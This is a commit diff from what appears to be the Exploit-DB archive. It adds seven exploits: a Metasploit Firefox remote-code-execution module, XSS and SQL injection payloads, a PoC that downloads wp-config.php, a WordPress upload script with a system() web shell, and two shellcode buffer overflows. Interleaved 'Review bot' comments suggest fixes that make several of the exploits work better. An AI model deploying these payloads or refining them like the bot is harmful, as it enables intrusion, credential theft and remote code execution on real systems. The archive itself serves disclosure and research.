DB: 2015-03-25
7 new exploits
parent
b607ee5335
commit
8f1f948d2a
8 changed files with 524 additions and 1 deletions
@ -32295,7 +32295,6 @@ id,file,description,date,author,platform,type,port
|
|||
35838,platforms/php/webapps/35838.txt,"Tolinet Agencia 'id' Parameter SQL Injection Vulnerability",2011-06-10,"Andrea Bocchetti",php,webapps,0
|
||||
35839,platforms/php/webapps/35839.txt,"Joomla Minitek FAQ Book 1.3 'id' Parameter SQL Injection Vulnerability",2011-06-13,kaMtiEz,php,webapps,0
|
||||
35840,platforms/php/webapps/35840.txt,"RedaxScript 2.1.0 - Privilege Escalation",2015-01-20,"shyamkumar somana",php,webapps,80
|
||||
35841,platforms/windows/remote/35841.txt,"Bsplayer 2.68 - HTTP Response Buffer Overflow",2015-01-20,"Fady Mohammed Osman",windows,remote,0
|
||||
35842,platforms/windows/dos/35842.c,"MalwareBytes Anti-Exploit 1.03.1.1220, 1.04.1.1012 Out-of-bounds Read DoS",2015-01-20,"Parvez Anwar",windows,dos,0
|
||||
35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products Authenticated File Upload",2015-01-20,metasploit,java,remote,8080
|
||||
35846,platforms/php/webapps/35846.txt,"WordPress Pixarbay Images Plugin 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80
|
||||
|
@ -32883,6 +32882,10 @@ id,file,description,date,author,platform,type,port
|
|||
36460,platforms/php/webapps/36460.txt,"Flirt-Projekt 4.8 'rub' Parameter SQL Injection Vulnerability",2011-12-17,Lazmania61,php,webapps,0
|
||||
36461,platforms/php/webapps/36461.txt,"Social Network Community 2 'userID' Parameter SQL Injection Vulnerability",2011-12-17,Lazmania61,php,webapps,0
|
||||
36462,platforms/php/webapps/36462.txt,"Video Community Portal 'userID' Parameter SQL Injection Vulnerability",2011-12-18,Lazmania61,php,webapps,0
|
||||
36463,platforms/php/webapps/36463.txt,"Telescope <= 0.9.2 - Markdown Persistent XSS",2015-03-21,shubs,php,webapps,0
|
||||
36464,platforms/php/webapps/36464.txt,"Joomla Spider FAQ Component - SQL Injection Vulnerability",2015-03-22,"Manish Tanwar",php,webapps,0
|
||||
36465,platforms/windows/local/36465.py,"Free MP3 CD Ripper 2.6 - Local Buffer Overflow",2015-03-22,"TUNISIAN CYBER",windows,local,0
|
||||
36466,platforms/php/webapps/36466.txt,"Wordpress Marketplace 2.4.0 - Arbitrary File Download",2015-03-22,"Kacper Szurek",php,webapps,0
|
||||
36468,platforms/php/webapps/36468.txt,"PHP Booking Calendar 10e 'page_info_message' Parameter Cross Site Scripting Vulnerability",2011-12-19,G13,php,webapps,0
|
||||
36469,platforms/php/webapps/36469.txt,"Joomla! 'com_tsonymf' Component 'idofitem' Parameter SQL Injection Vulnerability",2011-12-20,CoBRa_21,php,webapps,0
|
||||
36470,platforms/php/webapps/36470.txt,"Tiki Wiki CMS Groupware <= 8.1 'show_errors' Parameter HTML Injection Vulnerability",2011-12-20,"Stefan Schurtz",php,webapps,0
|
||||
|
@ -32892,3 +32895,6 @@ id,file,description,date,author,platform,type,port
|
|||
36474,platforms/php/webapps/36474.txt,"epesi BIM 1.2 rev 8154 Multiple Cross-Site Scripting Vulnerabilities",2011-12-21,"High-Tech Bridge SA",php,webapps,0
|
||||
36475,platforms/hardware/remote/36475.txt,"Barracuda Control Center 620 Cross Site Scripting and HTML Injection Vulnerabilities",2011-12-21,Vulnerability-Lab,hardware,remote,0
|
||||
36476,platforms/windows/local/36476.txt,"Kaspersky Internet Security/Anti-Virus '.cfg' File Memory Corruption Vulnerability",2011-12-21,"Vulnerability Research Laboratory",windows,local,0
|
||||
36477,platforms/windows/remote/36477.py,"Bsplayer 2.68 - HTTP Response Exploit (Universal)",2015-03-24,"Fady Mohammed Osman",windows,remote,0
|
||||
36478,platforms/php/webapps/36478.php,"WordPress Plugin InBoundio Marketing 1.0 - Shell Upload Vulnerability",2015-03-24,KedAns-Dz,php,webapps,0
|
||||
36480,platforms/multiple/remote/36480.rb,"Firefox Proxy Prototype Privileged Javascript Injection",2015-03-24,metasploit,multiple,remote,0
|
||||
|
|
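--- a/platforms/multiple/remote/36480.rb
+++ b/platforms/multiple/remote/36480.rb
@@ -0,0 +1,115 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/exploitation/jsobfu'
+
+class Metasploit3 < Msf::Exploit::Remote
+Rank = ManualRanking
+
+include Msf::Exploit::Remote::BrowserExploitServer
+include Msf::Exploit::Remote::BrowserAutopwn
+include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Firefox Proxy Prototype Privileged Javascript Injection',
+'Description' => %q{
+This exploit gains remote code execution on Firefox 31-34 by abusing a bug in the XPConnect
+component and gaining a reference to the privileged chrome:// window. This exploit
+requires the user to click anywhere on the page to trigger the vulnerability.
+},
+'License' => MSF_LICENSE,
+'Author' => [
+'joev' # discovery and metasploit module
+],
+'DisclosureDate' => "Jan 20 2014",
+'References' => [
+['CVE', '2014-8636'],
+['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1120261'],
+['URL', 'https://community.rapid7.com/community/metasploit/blog/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636' ]
+
+],
+'Targets' => [
+[
+'Universal (Javascript XPCOM Shell)', {
+'Platform' => 'firefox',
+'Arch' => ARCH_FIREFOX
+}
+],
+[
+'Native Payload', {
+'Platform' => %w{ java linux osx solaris win },
+'Arch' => ARCH_ALL
+}
+]
+],
+'DefaultTarget' => 0,
+'BrowserRequirements' => {
+:source => 'script',
+:ua_name => HttpClients::FF,
+:ua_ver => lambda { |ver| ver.to_i.between?(31, 34) }
+}
+))
+
+register_options([
+OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>." ])
+], self.class)
+end
+
+def on_request_exploit(cli, request, target_info)
+send_response_html(cli, generate_html(target_info))
+end
+
+def default_html
+"The page has moved. <span style='text-decoration:underline;'>Click here</span> to be redirected."
+end
+
+def generate_html(target_info)
+key = Rex::Text.rand_text_alpha(5 + rand(12))
+frame = Rex::Text.rand_text_alpha(5 + rand(12))
+r = Rex::Text.rand_text_alpha(5 + rand(12))
+opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
+
+js = js_obfuscate %Q|
+var opts = #{JSON.unparse(opts)};
+var key = opts['#{key}'];
+var props = {};
+props.has = function(n){
+if (!window.top.x && n=='nodeType') {
+window.top.x=window.open("chrome://browser/content/browser.xul", "x",
+"chrome,,top=-9999px,left=-9999px,height=100px,width=100px");
+if (window.top.x) {
+Object.setPrototypeOf(document, pro);
+setTimeout(function(){
+x.location='data:text/html,<iframe mozbrowser src="about:blank"></iframe>';
+
+setTimeout(function(){
+x.messageManager.loadFrameScript('data:,'+key, false);
+setTimeout(function(){
+x.close();
+}, 100)
+}, 100)
+}, 100);
+}
+}
+}
+var pro = Object.getPrototypeOf(document);
+Object.setPrototypeOf(document, Proxy.create(props));
+|
+
+%Q|
+<!doctype html>
+<html>
+<body>
+<script>
+#{js}
+</script>
+#{datastore['CONTENT'] || default_html}
+</body>
+</html>
+|
+end
+end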
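Review bot: `frame` and `r` in `generate_html` are assigned fresh random strings but never referenced anywhere in the generated page, so they are dead code that misleads a reader about how many randomised tokens the page actually carries; drop both lines or wire them into the markup. The bare `x` used inside the `setTimeout` callbacks resolves only because the page is the top-level window, so `window.top.x` and the global `x` coincide; if this page were ever served inside a frame the lookup would presumably fail, and `window.top.x.location` / `window.top.x.close()` would make the intent explicit. A one-line comment above `props.has` would save the next reader a trip to the referenced blog post, e.g. `// has-trap fires on the first 'nodeType' lookup (presumably the one the user's click triggers): open a chrome:// window, then restore the real prototype`.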
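--- a/platforms/php/webapps/36463.txt
+++ b/platforms/php/webapps/36463.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Persistent XSS via Markdown on Telescope <= 0.9.2
+# Date: Aug 22 2014
+# Exploit Author: shubs
+# Vendor Homepage: http://www.telescopeapp.org/
+# Software Link: https://github.com/TelescopeJS/Telescope
+# Version: <= 0.9.2
+# CVE : CVE-2014-5144
+
+Telescope 0.9.2 and below suffer from a persistent cross site scripting
+vulnerability due to the lack of input sanitisation and validation
+performed when parsing markdown user input. An authenticated user can
+include links, images, code blocks and more through markdown, in the form
+of comments, posts or replies and more.
+
+As an example, the following vectors below can be used in comments, posts
+or replies to trigger the XSS:
+
+[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
+[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
+
+Once posted as comments, the above markdown is converted to links without
+any sanitisation. When such links are clicked, the vector is executed
+successfully.
+
+Screenshots:
+http://i.imgur.com/6SQgUYd.png
+http://i.imgur.com/6VeZasj.png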
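Review bot: The advisory gives no fix or fixed version, and the root cause is stated loosely: both vectors work because Markdown link targets are emitted without restricting the URL scheme, so `javascript:` and `data:` hrefs survive, and the remediation a reader wants is scheme allow-listing (`http`, `https`, `mailto`) on rendered links plus HTML escaping, not generic "sanitisation". Adding a `# Solution:` line under the `# CVE` header (or an explicit "no fix available at time of writing") would make this usable for triage. Both payloads need a victim to click the link, which is worth stating next to them since it affects severity.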
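--- a/platforms/php/webapps/36464.txt
+++ b/platforms/php/webapps/36464.txt
@@ -0,0 +1,71 @@
+##################################################################################################
+#Exploit Title : Joomla Spider FAQ component SQL Injection vulnerability
+#Author : Manish Kishan Tanwar AKA error1046
+#Vendor Link : http://demo.web-dorado.com/spider-faq.html
+#Date : 21/03/2015
+#Discovered at : IndiShell Lab
+#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi
+#Discovered At : Indishell Lab
+##################################################################################################
+
+////////////////////////
+/// Overview:
+////////////////////////
+
+
+joomla component Spider FAQ is not filtering data in theme and Itemid parameters
+and hence affected from SQL injection vulnerability
+
+///////////////////////////////
+// Vulnerability Description:
+///////////////////////////////
+vulnerability is due to theme and Itemid parameter
+
+////////////////
+/// POC ////
+///////////////
+
+POC image=http://oi57.tinypic.com/2rh1zk7.jpg
+
+SQL Injection in theme parameter
+=================================
+
+Use error based double query injection with theme parameter
+Like error based double query injection for exploiting username --->
+and(select 1 FROM(select count(*),concat((select (select concat(user(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -
+
+Injected Link--->
+http://website.com/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=4 and(select 1 FROM(select count(*),concat((select (select concat(user(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- - &searchform=1&expand=0&Itemid=109
+
+
+SQL Injection in Itemid parameter
+=================================
+
+Itemid Parameter is exploitable using xpath injection
+
+User extraction payload
+------------------------
+' AND EXTRACTVALUE(6678,CONCAT(0x7e,(SELECT user() LIMIT 0,1),0x7e))-- -
+
+crafted URL--->
+http://localhostm/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=4&searchform=1&expand=0&Itemid=109' AND EXTRACTVALUE(6678,CONCAT(0x7e,(SELECT user() LIMIT 0,1),0x7e))-- -
+
+Table extraction
+-----------------
+' and extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e))-- -
+
+Crafted URL---->
+http://localhost/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=4&searchform=1&expand=0&Itemid=109' and extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e))-- -
+
+--==[[ Greetz To ]]==--
+############################################################################################
+#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
+#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
+#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
+#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
+#############################################################################################
+--==[[Love to]]==--
+# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
+#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty and Don(Deepika kaushik)
+--==[[ Special Fuck goes to ]]==--
+<3 suriya Cyber Tyson <3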
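Review bot: The advisory never states the affected component version, whether the vendor was contacted, or a fixed version, so a reader cannot tell which Spider FAQ releases to check; a `#Version :` and `#Fix :` line in the header block would resolve that. Both payloads are error-based (the `floor(rand(0)*2)` double-query trick and `EXTRACTVALUE`), which only leak data when MySQL error text is echoed into the page, a precondition the text should name; it is also worth one sentence that `theme=4 and(...)` is an integer context while `Itemid=109'` needs the quote, since that changes how each injection is terminated. `localhostm` in the first crafted URL looks like a typo for `localhost`, and the duplicated `#Discovered at` / `#Discovered At` header lines can be merged.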
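--- a/platforms/php/webapps/36466.txt
+++ b/platforms/php/webapps/36466.txt
@@ -0,0 +1,117 @@
+# Exploit Title: WP Marketplace 2.4.0 Arbitrary File Download
+# Date: 26-10-2014
+# Software Link: https://wordpress.org/plugins/wpmarketplace/
+# Exploit Author: Kacper Szurek
+# Contact: http://twitter.com/KacperSzurek
+# Website: http://security.szurek.pl/
+# Category: webapps
+# CVE: CVE-2014-9013 and CVE-2014-9014
+
+1. Description
+
+Anyone can run user defined function because of call_user_func.
+
+File: wpmarketplace\libs\cart.php
+
+function ajaxinit(){
+if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){
+if(function_exists($_POST['execute']))
+call_user_func($_POST['execute'],$_POST);
+else
+echo __("function not defined!","wpmarketplace");
+die();
+}
+}
+
+http://security.szurek.pl/wp-marketplace-240-arbitrary-file-download.html
+
+2. Proof of Concept
+
+$file = '../../../wp-config.php';
+$url = 'http://wordpress-url/';
+$user = 'userlogin';
+$email = 'useremail@email.email';
+$pass = 'password';
+$cookie = "/cookie.txt";
+
+$ckfile = dirname(__FILE__) . $cookie;
+$cookie = fopen($ckfile, 'w') or die("Cannot create cookie file");
+
+// Register
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, $url.'?checkout_register=register');
+curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
+curl_setopt($ch, CURLOPT_TIMEOUT, 10);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_POST, 1);
+curl_setopt($ch,
+CURLOPT_POSTFIELDS,
+array(
+'register_form' => 'register',
+'reg[user_login]' => $user,
+'reg[user_email]' => $email,
+'reg[user_pass]' => $pass
+));
+$content = curl_exec($ch);
+if (!preg_match("/success/i", $content)) {
+die("Cannot register");
+}
+// Log in
+curl_setopt($ch, CURLOPT_URL, $url.'wp-login.php');
+curl_setopt($ch,
+CURLOPT_POSTFIELDS,
+array(
+'log' => $user,
+'pwd' => $pass,
+'wp-submit' => 'Log%20In'
+));
+$content = curl_exec($ch);
+if (!preg_match('/adminmenu/i', $content)) {
+die("Cannot login");
+}
+// Add subscriber as plugin admin
+curl_setopt($ch, CURLOPT_URL, $url);
+curl_setopt($ch,
+CURLOPT_POSTFIELDS,
+array(
+'action' => 'wpmp_pp_ajax_call',
+'execute' => 'wpmp_save_settings',
+'_wpmp_settings[user_role][]' => 'subscriber'
+));
+$content = curl_exec($ch);
+if (!preg_match('/Settings Saved Successfully/i', $content)) {
+die("Cannot set role");
+}
+// Request noonce
+curl_setopt($ch, CURLOPT_URL, $url);
+curl_setopt($ch,
+CURLOPT_POSTFIELDS,
+array(
+'action' => 'wpmp_pp_ajax_call',
+'execute' => 'wpmp_front_add_product'
+));
+$content = curl_exec($ch);
+preg_match('/name="__product_wpmp" value="([^"]+)"/i', $content, $nonce);
+if (strlen($nonce[1]) < 2) {
+die("Cannot get nonce");
+}
+// Set file to download
+curl_setopt($ch, CURLOPT_URL, $url);
+curl_setopt($ch,
+CURLOPT_POSTFIELDS,
+array(
+'__product_wpmp' => $nonce[1],
+'post_type' => 'wpmarketplace',
+'id' => '123456',
+'wpmp_list[base_price]' => '0',
+'wpmp_list[file][]' => $file
+));
+$content = curl_exec($ch);
+header("Location: ".$url."?wpmpfile=123456");
+
+3. Solution:
+
+Update to version 2.4.1
+
+https://downloads.wordpress.org/plugin/wpmarketplace.2.4.1.zip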
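Review bot: `$cookie` starts as a path string and is then overwritten by `fopen` with a file handle, and that handle is what `curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie)` receives; `CURLOPT_COOKIEJAR` expects a filename, so the jar is written under the handle's string form and the session only survives because the same curl handle is reused for every request. Pass the path instead, `curl_setopt($ch, CURLOPT_COOKIEJAR, $ckfile);`, and drop the `fopen` line entirely. The PoC depends on open user registration via `?checkout_register=register`, which the Description should list as a precondition, and `$nonce[1]` is read before the match is checked, so a non-matching page raises an undefined-index notice; `if (empty($nonce[1]))` avoids that.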
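--- a/platforms/php/webapps/36478.php
+++ b/platforms/php/webapps/36478.php
@@ -0,0 +1,92 @@
+<?php
+###########################################
+#-----------------------------------------#
+#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
+#-----------------------------------------#
+# *----------------------------* #
+# K |....##...##..####...####....| . #
+# h |....#...#........#..#...#...| A #
+# a |....#..#.........#..#....#..| N #
+# l |....###........##...#.....#.| S #
+# E |....#.#..........#..#....#..| e #
+# D |....#..#.........#..#...#...| u #
+# . |....##..##...####...####....| r #
+# *----------------------------* #
+#-----------------------------------------#
+#[ Copyright (c) 2015 | Dz Offenders Cr3w]#
+#-----------------------------------------#
+###########################################
+# >> D_x . Made In Algeria . x_Z << #
+###########################################
+#
+# [>] Title : WordPress plugin (InBoundio Marketing) Shell Upload Vulnerability
+#
+# [>] Author : KedAns-Dz
+# [+] E-mail : ked-h (@hotmail.com)
+# [+] FaCeb0ok : fb.me/K3d.Dz
+# [+] TwiTter : @kedans
+#
+# [#] Platform : PHP / WebApp
+# [+] Cat/Tag : File Upload / Code Exec
+#
+# [<] <3 <3 Greetings t0 Palestine <3 <3
+# [!] Vendor : http://www.inboundio.com
+#
+###########################################
+#
+# [!] Description :
+#
+# Wordpress plugin InBoundio Marketing v1.0 is suffer from File/Shell Upload Vulnerability
+# remote attacker can upload file/shell/backdoor and exec commands.
+#
+####
+# Lines (6... to 20) : csv_uploader.php
+####
+#
+# ExpLO!T :
+# -------
+
+$postData = array();
+$postData[ 'file' ] = "@k3dz.php"; #Shell_2_Exec ;)
+
+$dz = curl_init();
+curl_setopt($dz, CURLOPT_URL, "http://[Target]/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php");
+curl_setopt($dz, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
+curl_setopt($dz, CURLOPT_POST, 1);
+curl_setopt($dz, CURLOPT_POSTFIELDS, $postData );
+curl_setopt($dz, CURLOPT_TIMEOUT, 0);
+$buf = curl_exec ($dz);
+curl_close($dz);
+unset($dz);
+echo $buf;
+
+/*
+[!] creat your shell file =>
+_ k3dz.php :
+
+<?php system($_GET['dz']); ?>
+
+[>] Post the exploit
+[+] Find you'r backdoor : ../inboundio-marketing/admin/partials/uploaded_csv/k3dz.php?dz=[ CMD ]
+[+] Or upload what you whant ^_^ ...
+
+*/
+
+####
+# <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
+# Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
+#---------------------------------------------------------------
+# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 ,
+# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
+# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
+# & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &
+# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
+# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day &
+# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;
+####
+
+# REF : http://k3dsec.blogspot.com/2015/03/wordpress-plugin-inboundio-marketing.html
+
+?>
+
+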
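Review bot: `$postData[ 'file' ] = "@k3dz.php";` relies on the legacy `@`-prefix upload syntax, which PHP 5.5 deprecated and 5.6 turns off by default through `CURLOPT_SAFE_UPLOAD`, so on a current interpreter the request posts the literal string rather than the file; use `$postData['file'] = new CURLFile('k3dz.php');` (or set `CURLOPT_SAFE_UPLOAD` to false on old PHP). `CURLOPT_RETURNTRANSFER` is never set, so `curl_exec` prints the body itself and `$buf` is only `true`, making the trailing `echo $buf` print `1`. The request carries no cookies or credentials, which implies `csv_uploader.php` accepts uploads unauthenticated; the Description should say so explicitly, and the `Lines (6... to 20)` reference would be far more useful with the offending code quoted rather than just its line range.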
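--- a/platforms/windows/local/36465.py
+++ b/platforms/windows/local/36465.py
@@ -0,0 +1,31 @@
+#!/usr/bin/python
+
+#[+] Author: TUNISIAN CYBER
+#[+] Exploit Title: Free MP3 CD Ripper All versions Local Buffer Overflow
+#[+] Date: 20-03-2015
+#[+] Type: Local Exploits
+#[+] Tested on: WinXp/Windows 7 Pro
+#[+] Vendor: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper
+#[+] Friendly Sites: sec4ever.com
+#[+] Twitter: @TCYB3R
+
+## EDB Note: Didn't work with Windows 7.
+
+from struct import pack
+file="evilfile.wav"
+junk="\x41"*4112
+eip = pack('<I',0x7C9D30D7)
+nops = "\x90" * 3
+#Calc.exe Shellcode
+#POC:http://youtu.be/_uvHKonqO2g
+shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78"
+"\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3"
+"\xb4\xae\x7d\x02\xaa\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"
+"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27\xdd\x48\xfd"
+"\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8"
+"\x3b\x83\x8e\x83\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98\xf5"
+"\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61\xb6\x0e\x2f\x85\x19\x87"
+"\xb7\x78\x2f\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca")
+writeFile = open (file, "w")
+writeFile.write(junk+eip+nops+shellcode)
+writeFile.close()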
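Review bot: `eip = pack('<I',0x7C9D30D7)` is an undocumented absolute address in the range Windows XP system DLLs occupy, which is presumably why the EDB note reports failure on Windows 7 even though the header lists `Windows 7 Pro` under `Tested on`; reconcile the header and the `All versions` title with that note, and have the line name what it points to, e.g. `eip = pack('<I',0x7C9D30D7)  # <module>!<instruction>, Windows XP SP3 only (no ASLR)`. The crash file is opened in text mode with `open (file, "w")`, which on Windows rewrites any `\n` byte in the buffer; `open(file, "wb")` is the right mode for a binary trigger even though this particular payload appears to contain no `\x0a`.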
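--- a/platforms/windows/remote/36477.py
+++ b/platforms/windows/remote/36477.py
@@ -0,0 +1,64 @@
+#!/usr/bin/python
+
+''' Bsplayer suffers from a buffer overflow vulnerability when processing the HTTP response when opening a URL.
+In order to exploit this bug I partially overwrited the seh record to land at pop pop ret instead of the full
+address and then used backward jumping to jump to a long jump that eventually land in my shellcode.
+
+Tested on : windows xp sp1 - windows 7 sp1 - Windows 8 Enterprise it might work in other versions as well just give it a try :)
+
+My twitter: @fady_osman
+My youtube: https://www.youtube.com/user/cutehack3r
+'''
+
+import socket
+import sys
+s = socket.socket() # Create a socket object
+if(len(sys.argv) < 3):
+print "[x] Please enter an IP and port to listen to."
+print "[x] " + sys.argv[0] + " ip port"
+exit()
+host = sys.argv[1] # Ip to listen to.
+port = int(sys.argv[2]) # Reserve a port for your service.
+s.bind((host, port)) # Bind to the port
+print "[*] Listening on port " + str(port)
+s.listen(5) # Now wait for client connection.
+c, addr = s.accept() # Establish connection with client.
+# Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload.
+print(('[*] Sending the payload first time', addr))
+c.recv(1024)
+#seh and nseh.
+buf = ""
+buf += "\xbb\xe4\xf3\xb8\x70\xda\xc0\xd9\x74\x24\xf4\x58\x31"
+buf += "\xc9\xb1\x33\x31\x58\x12\x83\xc0\x04\x03\xbc\xfd\x5a"
+buf += "\x85\xc0\xea\x12\x66\x38\xeb\x44\xee\xdd\xda\x56\x94"
+buf += "\x96\x4f\x67\xde\xfa\x63\x0c\xb2\xee\xf0\x60\x1b\x01"
+buf += "\xb0\xcf\x7d\x2c\x41\xfe\x41\xe2\x81\x60\x3e\xf8\xd5"
+buf += "\x42\x7f\x33\x28\x82\xb8\x29\xc3\xd6\x11\x26\x76\xc7"
+buf += "\x16\x7a\x4b\xe6\xf8\xf1\xf3\x90\x7d\xc5\x80\x2a\x7f"
+buf += "\x15\x38\x20\x37\x8d\x32\x6e\xe8\xac\x97\x6c\xd4\xe7"
+buf += "\x9c\x47\xae\xf6\x74\x96\x4f\xc9\xb8\x75\x6e\xe6\x34"
+buf += "\x87\xb6\xc0\xa6\xf2\xcc\x33\x5a\x05\x17\x4e\x80\x80"
+buf += "\x8a\xe8\x43\x32\x6f\x09\x87\xa5\xe4\x05\x6c\xa1\xa3"
+buf += "\x09\x73\x66\xd8\x35\xf8\x89\x0f\xbc\xba\xad\x8b\xe5"
+buf += "\x19\xcf\x8a\x43\xcf\xf0\xcd\x2b\xb0\x54\x85\xd9\xa5"
+buf += "\xef\xc4\xb7\x38\x7d\x73\xfe\x3b\x7d\x7c\x50\x54\x4c"
+buf += "\xf7\x3f\x23\x51\xd2\x04\xdb\x1b\x7f\x2c\x74\xc2\x15"
+buf += "\x6d\x19\xf5\xc3\xb1\x24\x76\xe6\x49\xd3\x66\x83\x4c"
+buf += "\x9f\x20\x7f\x3c\xb0\xc4\x7f\x93\xb1\xcc\xe3\x72\x22"
+buf += "\x8c\xcd\x11\xc2\x37\x12"
+
+jmplong = "\xe9\x85\xe9\xff\xff"
+nseh = "\xeb\xf9\x90\x90"
+# Partially overwriting the seh record (nulls are ignored).
+seh = "\x3b\x58\x00\x00"
+buflen = len(buf)
+response = "\x90" *2048 + buf + "\xcc" * (6787 - 2048 - buflen) + jmplong + nseh + seh #+ "\xcc" * 7000
+c.send(response)
+c.close()
+c, addr = s.accept() # Establish connection with client.
+# Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload.
+print(('[*] Sending the payload second time', addr))
+c.recv(1024)
+c.send(response)
+c.close()
+s.close()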
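Review bot: Both `# Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload.` comments describe a multi-stage flow (m3u, flv, payload) that this script does not implement; each accepted connection gets the same raw `response`, so the comment should say that, e.g. `# Serve the overflow buffer; BSplayer re-requests the URL, so answer the second connection identically.` The listener never sets `SO_REUSEADDR`, so re-running right after a crashed attempt fails with EADDRINUSE on the same port; add `s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)` before `s.bind`. `print(('[*] Sending the payload first time', addr))` prints a tuple repr rather than a message and mixes the function form with the `print "..."` statements used elsewhere; `print "[*] Sending the payload first time to " + str(addr)` matches the rest of the file. The `seh = "\x3b\x58\x00\x00"` partial overwrite pins a module-relative pop/pop/ret that the docstring never names, which is the one detail a reader porting this to another build needs.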